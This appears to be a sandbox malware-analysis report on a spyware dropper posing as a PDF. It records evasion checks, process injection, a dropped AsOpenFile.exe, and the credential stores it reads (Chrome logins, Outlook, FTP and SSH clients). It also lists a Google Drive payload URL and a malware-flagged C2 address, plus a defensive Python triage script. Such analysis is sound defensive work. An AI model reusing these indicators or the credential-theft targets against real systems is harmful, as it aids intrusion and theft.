Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe | Code function: 2_2_0040344A EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,
Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe | Code functions (no imports resolved, one per line in the original report): 2_2_004068DA, 2_2_00404CED, 2_2_032ECB42, 2_2_032D6122, 2_2_032D5B37, 2_2_032D7306, 2_2_032D5944, 2_2_032EF95D, 2_2_032D17BD, 2_2_032D61DB, 2_2_032D3DD6, 2_2_032D6221, 2_2_032D7430, 2_2_032D7607, 2_2_032D5C06, 2_2_032D5E16, 2_2_032D727E, 2_2_032D587A, 2_2_032D5A43, 2_2_032EE6AB, 2_2_032D58A1, 2_2_032D6C8B, 2_2_032EC892, 2_2_032D74FA, 2_2_032DA6F5, 2_2_032D6CCB, 2_2_032ECCDC, 5_2_0168101C
Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe | Code function: 2_2_032F07A4 NtProtectVirtualMemory,
Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe | Code function: 2_2_032F1813 NtResumeThread,
Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe | Code function: 5_2_0168157A NtProtectVirtualMemory,
Source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000002.00000002.54386463779.00000000029B3000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameAsOpenFile.exeL vs REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe
Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe | Section loaded: edgegdi.dll (reported twice)
Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe | File read: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe
Source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown | Process created: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe
Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe | Process created: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe
Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7568 -s 1980
Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe | Process created: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe
Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
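The process-creation lines above show the sample starting a second copy of its own image (twice) and WerFault.exe being launched with `-p 7568`, the PID of a process that crashed. A process re-launching its own image is the usual setup for the suspended-process injection that the "Creates a process in suspended mode" signature and the NtProtectVirtualMemory / NtResumeThread hits point at, and a crash in the chain is what the "One or more processes crash" signature records. As an added example (not part of the report), the following Python applies that heuristic to a constructed process-event list. Every PID except the 7568 taken from the WerFault command line, the explorer.exe event and the record layout are this example's assumptions.

```python
"""Flag a process that launches a copy of its own image, and tie it to a crash.

Added example, not part of the Joe Sandbox report. The report's process tree
shows the sample starting itself twice and WerFault.exe started with
"-u -p 7568 -s 1980"; spawning your own image is the usual setup for
suspended-process injection. PIDs other than 7568 and the event layout are
this example's assumptions.
"""
import re

SAMPLE = r"C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe"
WERFAULT = r"C:\Windows\SysWOW64\WerFault.exe"
WERFAULT_PID = re.compile(r"(?:^|\s)-p\s+(\d+)")   # -p <pid of the faulting process>

# Constructed process-creation events: (pid, ppid, image, command_line)
PROC_EVENTS = [
    (7568, 4100, SAMPLE, SAMPLE),                               # first stage (NSIS unpacker)
    (7600, 7568, SAMPLE, SAMPLE),                               # child copy of itself
    (7612, 7568, WERFAULT, WERFAULT + " -u -p 7568 -s 1980"),   # crash reported for 7568
    (7640, 7568, SAMPLE, SAMPLE),                               # second child copy
    (7700, 4100, r"C:\Windows\explorer.exe", "explorer.exe"),   # unrelated, for contrast
]


def self_spawns(events):
    """(parent_pid, child_pid) pairs where the child runs the parent's own image."""
    image_of = {pid: image.lower() for pid, _, image, _ in events}
    return [(ppid, pid) for pid, ppid, image, _ in events
            if ppid in image_of and image_of[ppid] == image.lower()]


def crashed_pids(events):
    """PIDs named by WerFault's -p argument."""
    out = set()
    for _, _, image, cmdline in events:
        if image.lower().endswith("\\werfault.exe"):
            m = WERFAULT_PID.search(cmdline)
            if m:
                out.add(int(m.group(1)))
    return out


def triage(events):
    """Parents that both re-launched their own image and had a crash reported against them."""
    spawners = {ppid for ppid, _ in self_spawns(events)}
    return sorted(spawners & crashed_pids(events))


if __name__ == "__main__":
    print(self_spawns(PROC_EVENTS), crashed_pids(PROC_EVENTS), triage(PROC_EVENTS))
```

On its own, self-spawning is noisy (updaters, browsers and installers all do it); the combination with a WerFault report for the same parent, or with the registry Uninstall key and AppData drop seen elsewhere in this report, is what makes it worth a look.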
Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe | File created: C:\Users\user\AppData\Local\Folkedansens
Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe | File created: C:\Users\user\AppData\Local\Temp\nsf145.tmp
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@4/6@2/3
Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe | Code function: 2_2_00402104 CoCreateInstance,
Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe | File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe | Code function: 2_2_00404771 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,
Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe | Mutant created: \Sessions\1\BaseNamedObjects\28278665D4ACB73EF64D459A
Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeRegistry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\BekvemmelighederJump to behavior
          Source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: mshtml.pdb source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000001.54204236542.0000000000649000.00000008.00000001.01000000.00000006.sdmp
          Source: Binary string: D:\SourceCode\ScenarioProfile\production_V4.2\ScenarioProfileFrameWork\Service\ServiceSDK\Release\ScenarioProfilePlugIn\AsOpenFile.pdb source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000002.00000002.54384265067.000000000040A000.00000004.00000001.01000000.00000003.sdmp, REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000002.00000002.54386463779.00000000029B3000.00000004.00000800.00020000.00000000.sdmp, AsOpenFile.exe.2.dr
          Source: Binary string: mshtml.pdbUGP source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000001.54204236542.0000000000649000.00000008.00000001.01000000.00000006.sdmp
          Source: Binary string: D:\SourceCode\ScenarioProfile\production_V4.2\ScenarioProfileFrameWork\Service\ServiceSDK\Release\ScenarioProfilePlugIn\AsOpenFile.pdb,,)GCTL source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000002.00000002.54384265067.000000000040A000.00000004.00000001.01000000.00000003.sdmp, REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000002.00000002.54386463779.00000000029B3000.00000004.00000800.00020000.00000000.sdmp, AsOpenFile.exe.2.dr

          Data Obfuscation

          Source: Yara match | File source: 00000002.00000002.54387083303.00000000032D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000000.54201456373.0000000001660000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000002.54385682867.00000000007CC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe | Code function: 2_2_10002DE0 push eax; ret
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe | Code function: 2_2_032D0730 push eax; retf
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe | Code function: 2_2_032D4DCE push eax; ret
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe | Code function: 2_2_032D46FC push ecx; iretd
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe | Code function: 2_2_10001B18 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe | File created: C:\Users\user\AppData\Local\Temp\nsq493.tmp\System.dll
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe | File created: C:\Users\user\AppData\Local\Folkedansens\Suffigere\Glaucophane\AsOpenFile.exe
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe | Process information set: NOGPFAULTERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX

          Malware Analysis System Evasion

          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe | File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe | File opened: C:\Program Files\qga\qga.exe
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe | Last function: Thread delayed
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Folkedansens\Suffigere\Glaucophane\AsOpenFile.exe
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe | Code function: 2_2_032D6F6D rdtsc
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe | Process information queried: ProcessInformation
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe | Code function: 2_2_00406555 FindFirstFileW,FindClose,
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe | Code function: 2_2_0040287E FindFirstFileW,
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe | Code function: 2_2_00405A03 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe | System information queried: ModuleInformation
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe | API call chain: ExitProcess graph end node
          Source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000002.00000002.54388031494.0000000010059000.00000004.00000800.00020000.00000000.sdmp, REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000002.54393846365.0000000003449000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Hyper-V Guest Shutdown Service
          Source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000002.54392074084.0000000001919000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW5
          Source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000002.00000002.54388031494.0000000010059000.00000004.00000800.00020000.00000000.sdmp, REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000002.54393846365.0000000003449000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Hyper-V Remote Desktop Virtualization Service
          Source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000002.54393846365.0000000003449000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: vmicshutdown
          Source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000002.00000002.54388031494.0000000010059000.00000004.00000800.00020000.00000000.sdmp, REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000002.54393846365.0000000003449000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Hyper-V Volume Shadow Copy Requestor
          Source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000002.00000002.54388031494.0000000010059000.00000004.00000800.00020000.00000000.sdmp, REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000002.54393846365.0000000003449000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Hyper-V PowerShell Direct Service
          Source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000002.00000002.54388031494.0000000010059000.00000004.00000800.00020000.00000000.sdmp, REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000002.54393846365.0000000003449000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Hyper-V Time Synchronization Service
          Source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000002.54393846365.0000000003449000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: vmicvss
          Source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000002.54391638858.00000000018E5000.00000004.00000020.00020000.00000000.sdmp, REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000002.54392074084.0000000001919000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
          Source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000002.00000002.54388031494.0000000010059000.00000004.00000800.00020000.00000000.sdmp, REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000002.54393846365.0000000003449000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Hyper-V Data Exchange Service
          Source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000002.00000002.54388031494.0000000010059000.00000004.00000800.00020000.00000000.sdmp, REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000002.54393846365.0000000003449000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Hyper-V Heartbeat Service
          Source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000002.00000002.54388031494.0000000010059000.00000004.00000800.00020000.00000000.sdmp, REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000002.54393846365.0000000003449000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Hyper-V Guest Service Interface
          Source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000002.54393846365.0000000003449000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: vmicheartbeat
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe | Code function: 2_2_10001B18 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe | Code function: 2_2_032D6F6D rdtsc
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe | Process token adjusted: Debug
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe | Code function: 2_2_032EF95D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe | Code function: 2_2_032D58A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe | Code function: 2_2_032DA6F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe | Code function: 2_2_032EDAC1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe | Process queried: DebugPort
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe | Code function: 2_2_032D9D4A LdrLoadDll,
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe | Process created: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe | Code function: 2_2_0040344A EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

          Stealing of Sensitive Information

          Source: Yara match | File source: dump.pcap, type: PCAP
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe | Key opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe | Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe | File opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe | File opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe | File opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

          Remote Access Functionality

          Source: Yara match | File source: dump.pcap, type: PCAP
          MITRE ATT&CK Matrix (a number in front of a technique is the count of matching signatures; cells without a number had no match)

          Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
          Valid Accounts | 1 Native API | 1 Windows Service | 1 Access Token Manipulation | 1 Masquerading | 2 OS Credential Dumping | 121 Security Software Discovery | Remote Services | 1 Email Collection | Exfiltration Over Other Network Medium | 11 Encrypted Channel | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | 1 System Shutdown/Reboot
          Default Accounts | Scheduled Task/Job | 1 DLL Side-Loading | 1 Windows Service | 11 Virtualization/Sandbox Evasion | 1 Credentials in Registry | 11 Virtualization/Sandbox Evasion | Remote Desktop Protocol | 1 Archive Collected Data | Exfiltration Over Bluetooth | 1 Ingress Tool Transfer | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
          Domain Accounts | At (Linux) | Logon Script (Windows) | 11 Process Injection | 1 Access Token Manipulation | Security Account Manager | 1 Process Discovery | SMB/Windows Admin Shares | 2 Data from Local System | Automated Exfiltration | 3 Non-Application Layer Protocol | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
          Local Accounts | At (Windows) | Logon Script (Mac) | 1 DLL Side-Loading | 11 Process Injection | NTDS | 2 File and Directory Discovery | Distributed Component Object Model | 1 Clipboard Data | Scheduled Transfer | 14 Application Layer Protocol | SIM Card Swap | Carrier Billing Fraud | -
          Cloud Accounts | Cron | Network Logon Script | Network Logon Script | 1 Obfuscated Files or Information | LSA Secrets | 6 System Information Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings | -
          Replication Through Removable Media | Launchd | Rc.common | Rc.common | 1 DLL Side-Loading | Cached Domain Credentials | System Owner/User Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features | -
          Source | Detection | Scanner
          REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe | 18% | ReversingLabs
          REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe | 100% | Joe Sandbox ML

          Source | Detection | Scanner
          C:\Users\user\AppData\Local\Folkedansens\Suffigere\Glaucophane\AsOpenFile.exe | 0% | ReversingLabs
          C:\Users\user\AppData\Local\Temp\nsq493.tmp\System.dll | 2% | ReversingLabs

          No Antivirus matches
Source | Detection | Scanner | Label | Link
http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference. | 0% | Avira URL Cloud | safe |
https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external | 0% | Avira URL Cloud | safe |
http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd | 0% | Avira URL Cloud | safe |
http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd | 0% | Avira URL Cloud | safe |
https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214 | 0% | Avira URL Cloud | safe |
http://157.245.36.27/~dokterpol/?page=2874 | 100% | Avira URL Cloud | malware |
http://www.gopher.ftp://ftp. | 0% | Avira URL Cloud | safe |
http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd | 0% | Virustotal | | Browse
http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd | 0% | Virustotal | | Browse
https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external | 0% | Virustotal | | Browse
Name | IP | Active | Malicious | Antivirus Detection | Reputation
drive.google.com | 142.250.185.238 | true | false | | high
googlehosted.l.googleusercontent.com | 142.250.185.161 | true | false | | high
doc-0g-8k-docs.googleusercontent.com | unknown | unknown | false | | high
Name | Malicious | Antivirus Detection | Reputation
https://doc-0g-8k-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/65eu063p0f9eoc2qkjfmonuuk5gkqmq4/1669764675000/03238822727237126472/*/1ZppbncXCwboWfcBo0A5zlqzevMjFwzpW?e=download&uuid=c4bc146b-22c6-4e17-89b8-c96a6eb96fab | false | | high
http://157.245.36.27/~dokterpol/?page=2874 | true | Avira URL Cloud: malware | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://doc-0g-8k-docs.googleusercontent.com/%%doc-0g-8k-docs.googleusercontent.com | REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000002.54391896205.0000000001901000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd | REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000001.54203683114.00000000005F2000.00000008.00000001.01000000.00000006.sdmp | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
https://drive.google.com/ | REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000002.54391638858.00000000018E5000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214 | REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000001.54204236542.0000000000649000.00000008.00000001.01000000.00000006.sdmp | false | Avira URL Cloud: safe | unknown
https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external | REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000003.54356841847.0000000001984000.00000004.00000020.00020000.00000000.sdmp, REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000002.54392074084.0000000001919000.00000004.00000020.00020000.00000000.sdmp | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference. | REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000001.54204236542.0000000000649000.00000008.00000001.01000000.00000006.sdmp | false | Avira URL Cloud: safe | unknown
http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd | REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000001.54203683114.00000000005F2000.00000008.00000001.01000000.00000006.sdmp | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
https://doc-0g-8k-docs.googleusercontent.com/) | REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000002.54391896205.0000000001901000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://nsis.sf.net/NSIS_ErrorError | REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe | false | | high
http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTD | REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000001.54204053166.0000000000626000.00000008.00000001.01000000.00000006.sdmp | false | | high
http://www.gopher.ftp://ftp. | REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000001.54204236542.0000000000649000.00000008.00000001.01000000.00000006.sdmp | false | Avira URL Cloud: safe | unknown
https://doc-0g-8k-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/65eu063p | REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000003.54362021539.0000000001943000.00000004.00000020.00020000.00000000.sdmp, REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000003.54356420593.0000000001943000.00000004.00000020.00020000.00000000.sdmp, REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000002.54392699460.0000000001943000.00000004.00000020.00020000.00000000.sdmp, REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000002.54392074084.0000000001919000.00000004.00000020.00020000.00000000.sdmp | false | | high
